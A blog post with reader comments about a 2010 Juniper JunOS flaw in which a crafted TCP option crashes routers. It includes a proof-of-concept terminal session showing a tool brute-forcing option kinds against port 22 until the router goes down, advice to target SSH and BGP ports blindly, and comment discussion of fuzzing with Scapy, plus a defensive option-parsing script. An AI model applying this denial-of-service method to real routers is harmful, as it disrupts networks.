January 7, 2010

Juniper JUNOS Remote Kernel Crash Flaw!

"Juniper Networks is warning customers of a critical flaw in its gateway routers that allows attackers to crash the devices by sending them small amounts of easily-spoofed traffic." - The Register

The JunOS kernel will crash (i.e. dump core) when a specifically crafted TCP option is received on a listening TCP port. The packet cannot be filtered with the JunOS firewall filter. A router receiving this specific TCP packet will crash and reboot.

Affected devices:
JunOS 3.x - 10.x (versions released later than 1/28/2009)
Software releases built on or after January 28, 2009 have already fixed the issue.

Solution:
Upgrade the OS. There are no totally effective workarounds.

Funny:
"A Juniper spokeswoman said the bulletin was one of seven security advisories the company issued under a policy designed to prevent members of the public at large from getting details of the vulnerabilities."
"Because of Juniper's 'Entitled Disclosure Policy,' only our customers and partners are allowed access to the details of the Security Advisory," the spokeswoman wrote.
Ooohhh... How about this: "when a specifically crafted TCP option is received on a listening TCP port"?
It's more than enough! We have 256 guesses ;)

Simple Proof-of-Concept demo:

hod# ping 169.254.1.1
PING 169.254.1.1 (169.254.1.1): 56 data bytes
64 bytes from 169.254.1.1: icmp_seq=0 ttl=254 time=4.623 ms
64 bytes from 169.254.1.1: icmp_seq=1 ttl=254 time=4.531 ms
64 bytes from 169.254.1.1: icmp_seq=2 ttl=254 time=4.315 ms
^C<...>

hod# ./hod-junos-test 169.254.1.1 22
[*] Target IP: 169.254.1.1, Port: 22
[+] Sending TCP-packets with various crafted TCP options
[+] TCP options bruteforce progress:
[..........................................................
...........................................................
...........................................................
.......................................................]
[+] OK

hod# ping 169.254.1.1
PING 169.254.1.1 (169.254.1.1): 56 data bytes
Request timeout for icmp_seq 0
Request timeout for icmp_seq 1
Request timeout for icmp_seq 2
^C

256 packets and the JunOS router is dead, and after analysing the sniffed traffic we know the true "evil" TCP packet!

The JunOS firewall filter (ACL) is unable to filter the TCP packet that triggers this issue!
Successful exploitation requires knowledge of a listening remote TCP port (open or firewall-filtered, it doesn't matter at all).
For example, attackers can blindly send a large number of crafted packets to "well known" TCP ports (22/SSH, 179/BGP and others).
And that's enough.
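
Since the post says the on-box firewall filter cannot drop the packet, what remains for a defender is off-box inspection of the TCP options field (span port, IDS, or triage of a capture). The Python below is an added example, not the author's hod-junos-test tool: it walks the options of a raw TCP header as an IDS rule would, flagging option kinds outside the commonly assigned set and malformed or overrunning lengths. The header builder and the sample headers in the test are constructed for the example, not captured traffic.

```python
"""Walk the TCP options of a raw TCP header and report anomalies an IDS
might alert on: rare/unassigned option kinds and malformed lengths."""
import struct

# Option kinds in routine use (MSS, window scale, SACK, timestamps,
# MD5 signature, TCP-AO, TCP Fast Open). Anything else is worth a look.
KNOWN_KINDS = {0, 1, 2, 3, 4, 5, 8, 19, 29, 34}


def parse_tcp_options(tcp_header: bytes):
    """Return (options, findings): options is a list of (kind, payload),
    findings is a list of strings describing anything suspicious."""
    findings = []
    if len(tcp_header) < 20:
        return [], ["truncated TCP header (%d bytes)" % len(tcp_header)]
    data_offset = (tcp_header[12] >> 4) * 4      # header length in bytes
    if data_offset < 20 or data_offset > len(tcp_header):
        return [], ["bad data offset %d" % data_offset]
    opts = tcp_header[20:data_offset]
    options, i = [], 0
    while i < len(opts):
        kind = opts[i]
        if kind == 0:                            # End of Option List
            break
        if kind == 1:                            # NOP is a single byte
            options.append((1, b""))
            i += 1
            continue
        if i + 1 >= len(opts):                   # kind byte but no length
            findings.append("kind %d has no length byte" % kind)
            break
        length = opts[i + 1]
        if length < 2 or i + length > len(opts): # would overrun header
            findings.append("kind %d has bad length %d" % (kind, length))
            break
        options.append((kind, opts[i + 2:i + length]))
        if kind not in KNOWN_KINDS:
            findings.append("unassigned/rare option kind %d" % kind)
        i += length
    return options, findings


def build_header(options: bytes) -> bytes:
    """Constructed SYN to port 22 carrying the given options (padded to
    a 4-byte boundary); checksum left zero since nothing is sent."""
    options += b"\x00" * (-len(options) % 4)
    data_offset = (20 + len(options)) // 4
    fixed = struct.pack("!HHIIBBHHH", 40000, 22, 1, 0,
                        data_offset << 4, 0x02, 65535, 0, 0)
    return fixed + options
```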

63 comments:

  1. Are you just looping through the first 8 bits of the TCP options header? Looking at the ol' TCP header diagram here it looks like TCP options + padding has 32 bits to muck with.

  2. Thx Ryan for the comment.

    Of course, TCP options have a variable length.
    In the first test case I fuzzed only the option-kind octet:
    option-kind octet - fuzzed
    other octets - constants
    And of course, full fuzzing is much more than 8 bits, but it doesn't take too long either.

  3. Thanks!

    It was late when I tried this, but I see now that the options are variable length. I looped through all the values in the option-kind octet (assuming only one option here), with a value octet of x00, then I tried just plain leaving the value off. I could do some captures here, but am using Scapy and I betcha it is properly padding out the option field... this requires an improperly padded field, right?

  4. Also see this blog + video:
    http://www.toonk.nl/blog/?p=522
    Seems that firewall filters do help to a certain extent.
